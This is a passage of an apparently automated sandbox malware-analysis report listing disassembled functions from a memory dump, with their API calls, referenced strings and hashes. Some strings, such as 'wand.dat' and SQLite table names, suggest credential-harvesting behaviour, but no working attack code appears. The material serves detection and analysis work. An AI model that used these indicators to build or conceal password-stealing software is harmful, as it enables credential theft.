                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1661045500-0
                                                                                                                                                                                                                    • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                                                    • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0042EC7A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                                                                                                                                    • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                                                                                                                                    • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                                                    • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                                                                    • API String ID: 1297977491-2063813899
                                                                                                                                                                                                                    • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                                                    • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040560C
                                                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                                                                                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                                                                                                                                                                      • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                                                    • String ID: *.*$dat$wand.dat
                                                                                                                                                                                                                    • API String ID: 2618321458-1828844352
                                                                                                                                                                                                                    • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                                                                    • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                                                                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 00410C74
                                                                                                                                                                                                                    • _wtoi.MSVCRT ref: 00410C80
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1549203181-0
                                                                                                                                                                                                                    • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                                                                                                                    • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00412057
                                                                                                                                                                                                                      • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                                                                                    • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                                                                                    • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3550944819-0
                                                                                                                                                                                                                    • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                                                                    • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040A8D0 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                                                                                                                                      • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@$memcpy$mallocwcslen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3023356884-0
                                                                                                                                                                                                                    • Opcode ID: eb2dac0aa54b8cba7b4ca2ec857782df2eef664205fa6e7b031a1e013bb73dd8
                                                                                                                                                                                                                    • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb2dac0aa54b8cba7b4ca2ec857782df2eef664205fa6e7b031a1e013bb73dd8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040B1D1 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                                                                                                                                                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                                                                                                                                      • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040B248
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@$memcpy$mallocwcslen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3023356884-0
                                                                                                                                                                                                                    • Opcode ID: 265e11fb3b93f6842ac601c308daddd794573f9d2d057257d07b24b118d7ea2e
                                                                                                                                                                                                                    • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 265e11fb3b93f6842ac601c308daddd794573f9d2d057257d07b24b118d7ea2e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                    • API String ID: 3510742995-2766056989
                                                                                                                                                                                                                    • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                                                    • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1865533344-0
                                                                                                                                                                                                                    • Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                                                                                                                                                                                    • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040B0D1 Relevance: 6.1, APIs: 4, Instructions: 55stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                                                                                                                                                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                                                                                                                                      • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040B159
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@$memcpy$mallocstrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1171893557-0
                                                                                                                                                                                                                    • Opcode ID: d8b96de248f7d7037f9e30158b7ab90977b72bd63dac2b37973b5005ce90d3f5
                                                                                                                                                                                                                    • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d8b96de248f7d7037f9e30158b7ab90977b72bd63dac2b37973b5005ce90d3f5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004144E7
                                                                                                                                                                                                                      • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                                                      • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                                                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0041451A
                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1127616056-0
                                                                                                                                                                                                                    • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                                                                    • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                                                    • String ID: sqlite_master
                                                                                                                                                                                                                    • API String ID: 438689982-3163232059
                                                                                                                                                                                                                    • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                                                                                                                    • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3917621476-0
                                                                                                                                                                                                                    • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                                                                                                                                    • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 0041101F
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 822687973-0
                                                                                                                                                                                                                    • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                                                                                                                    • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7756DF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                                    • malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7756DF80,?,0041755F,?), ref: 00417478
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$??3@malloc
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4284152360-0
                                                                                                                                                                                                                    • Opcode ID: 35e3d96e4e8f16596d993fb63affbe7c511ca80ecd689a4fb8a2c9eba3d4a450
                                                                                                                                                                                                                    • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 35e3d96e4e8f16596d993fb63affbe7c511ca80ecd689a4fb8a2c9eba3d4a450
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                                                                                                                    • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2678498856-0
                                                                                                                                                                                                                    • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                                                                    • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

